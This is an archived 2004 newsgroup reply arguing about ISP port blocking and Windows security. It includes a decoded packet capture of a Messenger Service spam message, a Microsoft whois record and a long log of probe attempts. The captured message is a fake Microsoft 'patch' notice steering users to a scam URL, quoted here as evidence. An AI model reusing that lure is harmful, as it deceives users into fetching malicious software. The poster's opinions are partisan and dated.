Re: I am REALLY Getting Tired of Probes on 445 and 135
From: jayjwa (jayjwa_at_nowhere.org)
Date: 11/17/04
- Next message: jayjwa: "Re: Anonymous surfing"
- Previous message: jayjwa: "Re: Antivirus AntiSpyware combo program?"
- In reply to:(deleted message) Leythos: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Next in thread: Leythos: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Reply: Mike: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Reply: Lars M. Hansen: "Re: I am REALLY Getting Tired of Probes on 445 and 135"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 17 Nov 2004 02:44:58 -0000
On 2004-11-14, Leythos <void@nowhere.org> wrote:
>> > I think that all ISP's
>> > should force NAT on users via their DSL/Cable modems, and all of the
>> > DSL/Cable modems should block outbound 135~139/445/1433/1434. There is
>> > no valid reason to connect on those ports - that's what a VPN is for.
>>
>> I don't. Why should I have any of my Internet access restricted in any way due
>> to MS and their legions of users running their glass-jawed OS? If I'm paying
>> for Internet access, I want *full* Internet access, not just the ports that
>> are "safe" (the ones that there's no MS virus/exploit written for yet).
>>
>> Following this logic, we should then also block all 1025, 1026, 2145, 5000,
>> 5554, 6129, 9898, 12345, 17300, and 31337?
>
> because it's not YOUR internet access, it's a service provided by the
> ISP and they can change it at any time without your permission.
Sure...and *I* can then take my money and give it to an ISP that doesn't do
such nonsense.
> While you may not like it, MS machines are the most compromised on the
> net and there is little going to change about that. If you're not using
100% agreed
> a MS machine then blocking those ports (the ones I mentioned) would mean
> little, if anything, to your system. Since the ports I mentioned are not
> something that should be used "across" the internet by MS machines,
> there is little reason to expose them on networks being used by MS
> systems, in fact, it might increase everyone's performance if they were
> blocked.
There are other implementations of SMB and even netbios than MS's:
http://www.samba.org/
> One last thing - nice troll on the MS OS, it's actually quite stable,
> quite securable, and quite easy to manage once you learn it, much the
> same as Linux.
Stable? Like when rebooting is the norm, required constantly (remove an app:
reboot. Upgrade something: reboot. Change a setting: reboot. Reboot: reboot. )
Rebooting systems aren't stable. Ever run more than 3 things to once each in
its own "window"? reminds me of task *switching*, not real multi-tasking. The
desktop becomes discolored. Apps hang. Parts of the OS simply "disappear". I'm
forced into using W32 frequently, and I've used Windows since 3.1. Little has
changed. The browser is integrated into the OS.
After cleaning an infect machine I had all but disabled MSIE; then, used
something completely unrelated to IE, and here comes IE... Pop! On flashes the
AV- Warning DSO exploit attempt. Currently there are major vulnerabilities for
it which have no patch (read Full Disclosure). How is that secure? MS takes
months to fix even trivial bugs. If at all. How is that secure? The fact that
there's hundreds of thousands of viruses for Windows is a testament to just
how easy it is to gain control of the OS from outside. Spyware? Adware? Those
are, again, purely MS Windows problems. If fact, amazingly, you can not
connect a brand new Windows XP system out of the box to the Internet and *not*
have it get owned. That's pretty bad. Find any Windows system on the 'Net-
they're the ones with port 1025, 1026, or 1027 open to the world, flapping in
the breeze. Tons of useless "services" enabled by default. Most users don't
know they even exist. port 5000. Windows 'Networking'. Messenger Spam:
Frame 1 (825 bytes on wire, 825 bytes captured)
Arrival Time: Nov 16, 2004 00:46:39.779560000
Time delta from previous packet: 0.000000000 seconds
Time since reference or first frame: 0.000000000 seconds
Frame Number: 1
Packet Length: 825 bytes
Capture Length: 825 bytes
Linux cooked capture
Packet type: Unicast to us (0)
Link-layer address type: 512
Link-layer address length: 0
Source: <MISSING>
Protocol: IP (0x0800)
Internet Protocol, Src Addr: 70.240.112.68 (70.240.112.68), Dst Addr: 64.179.7.203 (64.179.7.203)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
0000 00.. = Differentiated Services Codepoint: Default (0x00)
.... ..0. = ECN-Capable Transport (ECT): 0
.... ...0 = ECN-CE: 0
Total Length: 809
Identification: 0xd9ea (55786)
Flags: 0x00
0... = Reserved bit: Not set
.0.. = Don't fragment: Not set
..0. = More fragments: Not set
Fragment offset: 0
Time to live: 108
Protocol: UDP (0x11)
Header checksum: 0x7227 (correct)
Source: 70.240.112.68 (70.240.112.68)
Destination: 64.179.7.203 (64.179.7.203)
User Datagram Protocol, Src Port: 21902 (21902), Dst Port: 1026 (1026)
Source port: 21902 (21902)
Destination port: 1026 (1026)
Length: 789
Checksum: 0x0000 (none)
DCE RPC
Version: 4
Packet type: Request (0)
Flags1: 0x28
0... .... = Reserved: Not set
.0.. .... = Broadcast: Not set
..1. .... = Idempotent: Set
...0 .... = Maybe: Not set
.... 1... = No Fack: Set
.... .0.. = Fragment: Not set
.... ..0. = Last Fragment: Not set
.... ...0 = Reserved: Not set
Flags2: 0x00
0... .... = Reserved: Not set
.0.. .... = Reserved: Not set
..0. .... = Reserved: Not set
...0 .... = Reserved: Not set
.... 0... = Reserved: Not set
.... .0.. = Reserved: Not set
.... ..0. = Cancel Pending: Not set
.... ...0 = Reserved: Not set
Data Representation: 100000
Byte order: Little-endian (1)
Character: ASCII (0)
Floating-point: IEEE (0)
Serial High: 0x00
Object UUID: 00000000-0000-0000-0000-000000000000
Interface: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc
Activity: fc125ffc-5cdc-d83a-cd35-6be5d09f7312
Server boot time: Unknown (0)
Interface Ver: 1
Sequence num: 0
Opnum: 0
Interface Hint: 0xffff
Activity Hint: 0xffff
Fragment len: 701
Fragment num: 0
Auth proto: None (0)
Serial Low: 0x00
Microsoft Messenger Service, NetrSendMessage
Operation: NetrSendMessage (0)
Server
Max Count: 10
Offset: 0
Actual Count: 10
Server: UPDATENOW
Client
Max Count: 10
Offset: 0
Actual Count: 10
Client: WINDOWS
Message
Max Count: 641
Offset: 0
Actual Count: 641
Message: Important Notice From MSOFT\r\n\r\n
Buffer Overflow in Messenger Service Allows Unexpected
Computer Shutdown,\r\nVirus Infection and Remote Code
Execution\r\n\r\nAffected Software: \r\n\r\nMicrosoft
Windows NT Workstation \r\nMicro
0000 00 00 02 00 00 00 00 00 00 00 00 00 00 00 08 00 ................
0010 45 00 03 29 d9 ea 00 00 6c 11 72 27 46 f0 70 44 E..)....l.r'F.pD
0020 40 b3 07 cb 55 8e 04 02 03 15 00 00 04 00 28 00 @...U.........(.
0030 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 f8 91 7b 5a 00 ff d0 11 a9 b2 00 c0 ......{Z........
0050 4f b6 e6 fc fc 5f 12 fc dc 5c 3a d8 cd 35 6b e5 O...._...\:..5k.
0060 d0 9f 73 12 00 00 00 00 01 00 00 00 00 00 00 00 ..s.............
0070 00 00 ff ff ff ff bd 02 00 00 00 00 0a 00 00 00 ................
0080 00 00 00 00 0a 00 00 00 55 50 44 41 54 45 4e 4f ........UPDATENO
0090 57 00 00 00 0a 00 00 00 00 00 00 00 0a 00 00 00 W...............
00a0 57 49 4e 44 4f 57 53 00 00 00 00 00 81 02 00 00 WINDOWS.........
00b0 00 00 00 00 81 02 00 00 49 6d 70 6f 72 74 61 6e ........Importan
00c0 74 20 4e 6f 74 69 63 65 20 46 72 6f 6d 20 4d 53 t Notice From MS
00d0 4f 46 54 0d 0a 0d 0a 42 75 66 66 65 72 20 4f 76 OFT....Buffer Ov
00e0 65 72 66 6c 6f 77 20 69 6e 20 4d 65 73 73 65 6e erflow in Messen
00f0 67 65 72 20 53 65 72 76 69 63 65 20 41 6c 6c 6f ger Service Allo
0100 77 73 20 55 6e 65 78 70 65 63 74 65 64 20 43 6f ws Unexpected Co
0110 6d 70 75 74 65 72 20 53 68 75 74 64 6f 77 6e 2c mputer Shutdown,
0120 0d 0a 56 69 72 75 73 20 49 6e 66 65 63 74 69 6f ..Virus Infectio
0130 6e 20 61 6e 64 20 52 65 6d 6f 74 65 20 43 6f 64 n and Remote Cod
0140 65 20 45 78 65 63 75 74 69 6f 6e 0d 0a 0d 0a 41 e Execution....A
0150 66 66 65 63 74 65 64 20 53 6f 66 74 77 61 72 65 ffected Software
0160 3a 20 0d 0a 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 : ....Microsoft
0170 57 69 6e 64 6f 77 73 20 4e 54 20 57 6f 72 6b 73 Windows NT Works
0180 74 61 74 69 6f 6e 20 0d 0a 4d 69 63 72 6f 73 6f tation ..Microso
0190 66 74 20 57 69 6e 64 6f 77 73 20 4e 54 20 53 65 ft Windows NT Se
01a0 72 76 65 72 20 34 2e 30 20 0d 0a 4d 69 63 72 6f rver 4.0 ..Micro
01b0 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 32 30 30 soft Windows 200
01c0 30 20 20 20 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 0 ..Microsoft
01d0 57 69 6e 64 6f 77 73 20 58 50 20 20 0d 0a 4d 69 Windows XP ..Mi
01e0 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 crosoft Windows
01f0 57 69 6e 39 38 20 20 20 0d 0a 4d 69 63 72 6f 73 Win98 ..Micros
0200 6f 66 74 20 57 69 6e 64 6f 77 73 20 53 65 72 76 oft Windows Serv
0210 65 72 20 32 30 30 33 0d 0a 0d 0a 4e 6f 6e 20 41 er 2003....Non A
0220 66 66 65 63 74 65 64 20 53 6f 66 74 77 61 72 65 ffected Software
0230 3a 20 0d 0a 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 : ....Microsoft
0240 57 69 6e 64 6f 77 73 20 4d 69 6c 6c 65 6e 6e 69 Windows Millenni
0250 75 6d 20 45 64 69 74 69 6f 6e 0d 0a 0d 0a 59 6f um Edition....Yo
0260 75 72 20 73 79 73 74 65 6d 20 49 53 20 61 66 66 ur system IS aff
0270 65 63 74 65 64 2c 20 64 6f 77 6e 6c 6f 61 64 20 ected, download
0280 74 68 65 20 70 61 74 63 68 20 66 72 6f 6d 20 74 the patch from t
0290 68 65 20 61 64 64 72 65 73 73 20 62 65 6c 6f 77 he address below
02a0 20 21 20 0d 0a 46 49 52 53 54 20 54 59 50 45 20 ! ..FIRST TYPE
02b0 54 48 45 20 55 52 4c 20 42 45 4c 4f 57 20 49 4e THE URL BELOW IN
02c0 54 4f 20 59 4f 55 52 20 49 4e 54 45 52 4e 45 54 TO YOUR INTERNET
02d0 20 42 52 4f 57 53 45 52 2c 20 54 48 45 4e 20 43 BROWSER, THEN C
02e0 4c 49 43 4b 20 27 4f 4b 27 20 0d 0a 20 20 20 20 LICK 'OK' ..
02f0 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 ..
0300 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0310 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0320 20 20 20 20 20 20 20 57 57 57 2e 55 50 44 41 54 WWW.UPDAT
0330 45 4e 4f 57 2e 4f 52 47 00 ENOW.ORG.
Microsoft's *own machines* are infested with the same viruses that
plague their customers:
On going for several months now, the machine at IP address 207.46.98.138
has targeted my host endlessly, attempting multiple times to connect to
TCP port 80 with one hour, every hour. According to whois listings, this
is the address of:
OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US
NetRange: 207.46.0.0 - 207.46.255.255
CIDR: 207.46.0.0/16
NetName: MICROSOFT-GLOBAL-NET
NetHandle: NET-207-46-0-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Assignment
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 1997-03-31
Updated: 2002-12-05
TechHandle: ZM39-ARIN
TechName: Microsoft
TechPhone: +1-425-936-4200
TechEmail: noc@microsoft.com
OrgAbuseHandle: HOTMA-ARIN
OrgAbuseName: Hotmail Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@hotmail.com
OrgAbuseHandle: MSNAB-ARIN
OrgAbuseName: MSN ABUSE
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@msn.com
OrgAbuseHandle: ABUSE231-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@microsoft.com
OrgNOCHandle: ZM23-ARIN
OrgNOCName: Microsoft Corporation
OrgNOCPhone: +1-425-882-8080
OrgNOCEmail: noc@microsoft.com
OrgTechHandle: MSFTP-ARIN
OrgTechName: MSFT-POC
OrgTechPhone: +1-425-882-8080
OrgTechEmail: iprrms@microsoft.com
# ARIN WHOIS database, last updated 2004-11-12 19:10
Several email notices of abuse have been sent to abuse@microsoft.com. There
has been no reply. Listed at http://www.mynetwatchman.com/LID.asp?IID=116661437
one can see an incident write-up for this host, for the same issues. Here is
a typical example of log activity:
<Fri Nov 12 09:18:32 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:18:35 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:18:41 2004> 207.46.98.138:4154 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:30:52 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:30:55 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:31:01 2004> 207.46.98.138:1624 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:48 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:51 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 09:42:58 2004> 207.46.98.138:4239 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:17 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:20 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 10:03:26 2004> 207.46.98.138:3275 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:47:56 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:47:59 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:48:05 2004> 207.46.98.138:3979 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:04 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:07 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 11:59:13 2004> 207.46.98.138:3023 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:01 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:04 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:12:10 2004> 207.46.98.138:4406 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:32 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:35 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:23:41 2004> 207.46.98.138:4777 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:44 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:47 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:34:53 2004> 207.46.98.138:1467 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:16 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:19 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:47:25 2004> 207.46.98.138:3610 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:50 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:53 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 12:57:59 2004> 207.46.98.138:4787 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:43 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:46 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:08:52 2004> 207.46.98.138:1966 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:12 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:15 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:19:21 2004> 207.46.98.138:4653 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:44 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:47 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:32:53 2004> 207.46.98.138:4484 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:41 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:44 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 13:44:50 2004> 207.46.98.138:3287 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:21 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:24 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:07:30 2004> 207.46.98.138:4903 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:40 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:43 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:18:49 2004> 207.46.98.138:4479 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:06 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:09 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:32:15 2004> 207.46.98.138:4176 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:26 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:29 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:46:35 2004> 207.46.98.138:4328 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:33 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:37 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 14:57:43 2004> 207.46.98.138:4713 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:01 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:04 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:10:10 2004> 207.46.98.138:3596 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:49 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:52 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:21:58 2004> 207.46.98.138:4955 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:24 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:27 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:34:33 2004> 207.46.98.138:1282 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:20 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:23 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:45:30 2004> 207.46.98.138:4191 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:50 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:53 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 15:56:59 2004> 207.46.98.138:1175 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:43 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:46 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:44:52 2004> 207.46.98.138:3785 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:14 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:17 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 17:58:23 2004> 207.46.98.138:3804 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:31 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:34 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:09:40 2004> 207.46.98.138:3420 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:14 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:17 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:21:23 2004> 207.46.98.138:3732 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:35 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:38 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 18:33:44 2004> 207.46.98.138:1771 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:16 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:19 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:12:25 2004> 207.46.98.138:1201 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:35 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:38 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:23:44 2004> 207.46.98.138:3296 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:21 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:24 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:37:30 2004> 207.46.98.138:1363 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:47 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:50 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:48:56 2004> 207.46.98.138:3558 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:30 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:33 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Fri Nov 12 21:59:39 2004> 207.46.98.138:4545 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:27 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:30 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
<Sat Nov 13 01:18:36 2004> 207.46.98.138:4652 - Windows 2000 SP4, XP SP1 -> 64.179.13.228:80 (distance 16, link: ethernet/modem)
